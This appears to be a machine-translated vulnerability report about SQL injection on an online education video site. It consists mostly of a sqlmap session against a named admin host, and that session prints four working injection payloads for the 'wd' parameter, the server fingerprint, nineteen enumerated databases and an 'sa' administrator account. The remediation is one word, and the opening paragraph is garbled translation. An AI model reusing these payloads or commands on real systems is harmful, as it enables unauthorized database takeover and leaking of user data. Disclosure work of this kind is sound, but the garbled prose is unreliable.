Superstar education's SQL Injection across multiple databases to leak a large amount of data

Superstar education's SQL Injection across multiple databases to leak a large amount of data

Avengers 2 tells a story about how a local programmer who is overconfident and writes a bug program to work overtime to fix the vulnerability. Also known as: On the self-cultivation of a programmer, Raytheon is a good product manager, and products without beta testing always run wrong. the difference in interaction caused by different UIS is also completed in self-written bug crying.

F:\Python26\sqlmap>sqlmap.py -u "http://admin.eryavideo.com/outreachinfopeaker.aspx?type=0&wd=a" --dbs    sqlmap/1.0-dev - automatic SQL injection and database takeover tool    http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prio consent is illegal. It is the end user's responsibility to obey all applocal, state and federal laws. Developers assume no liability and are nosible for any misuse or damage caused by this program[*] starting at 18:58:44[18:58:44] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as th directory[18:58:44] [INFO] resuming back-end DBMS 'microsoft sql server'[18:58:44] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(sts:---Place: GETParameter: wd    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: type=0&wd=a%' AND 7734=7734 AND '%'='    Type: error-based    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING    Payload: type=0&wd=a%' AND 3045=CONVERT(INT,(SELECT CHAR(113)+CHAR(1(102)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (3045=3045) THEN CHAR(49) E(48) END))+CHAR(113)+CHAR(121)+CHAR(115)+CHAR(106)+CHAR(113))) AND '%'='    Type: stacked queries    Title: Microsoft SQL Server/Sybase stacked queries    Payload: type=0&wd=a%'; WAITFOR DELAY '0:0:5'--    Type: AND/OR time-based blind    Title: Microsoft SQL Server/Sybase time-based blind    Payload: type=0&wd=a%' WAITFOR DELAY '0:0:5'-----[18:58:44] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.5072back-end DBMS: Microsoft SQL Server 2005[18:58:44] [INFO] fetching database names[18:58:44] [INFO] the SQL query used returns 19 entries[18:58:44] [INFO] resumed: 2011erya100[18:58:44] [INFO] resumed: AdminSSreaderVideo[18:58:44] [INFO] resumed: EduErya100[18:58:44] [INFO] resumed: erya100data[18:58:44] [INFO] resumed: EryaVideo[18:58:44] [INFO] resumed: JiJiaoVideo[18:58:44] [INFO] resumed: JXSSreaderVideo[18:58:44] [INFO] resumed: master[18:58:44] [INFO] resumed: model[18:58:44] [INFO] resumed: msdb[18:58:44] [INFO] resumed: SSreaderVideofxhy[18:58:44] [INFO] resumed: ssreadervideosxtlgc[18:58:44] [INFO] resumed: SSVideoCN[18:58:44] [WARNING] cannot properly display Unicode characters inside WS command prompt (http://bugs.python.org/issue1602). All unhandled occurll result in replacement with '?' character. Please, find proper charactsentation inside corresponding output files.[18:58:44] [INFO] resumed: ssvideo????[18:58:44] [INFO] resumed: tempdb[18:58:44] [INFO] resumed: tmp[18:58:44] [INFO] resumed: ZaiFanVideo[18:58:44] [INFO] resumed: ZaiFanVideoNew[18:58:44] [INFO] resumed: zxxvideoavailable databases [19]:[*] 2011erya100[*] AdminSSreaderVideo[*] EduErya100[*] erya100data[*] EryaVideo[*] JiJiaoVideo[*] JXSSreaderVideo[*] master[*] model[*] msdb[*] SSreaderVideofxhy[*] ssreadervideosxtlgc[*] SSVideoCN[*] ssvideo????[*] tempdb[*] tmp[*] ZaiFanVideo[*] ZaiFanVideoNew[*] zxxvideo[18:58:44] [INFO] fetched data logged to text files under 'C:\Users\Admir\.sqlmap\output\admin.eryavideo.com'[*] shutting down at 18:58:44

database management system users privileges:[*] sa (administrator)[*] ssvideo_user

 

Solution:

Filter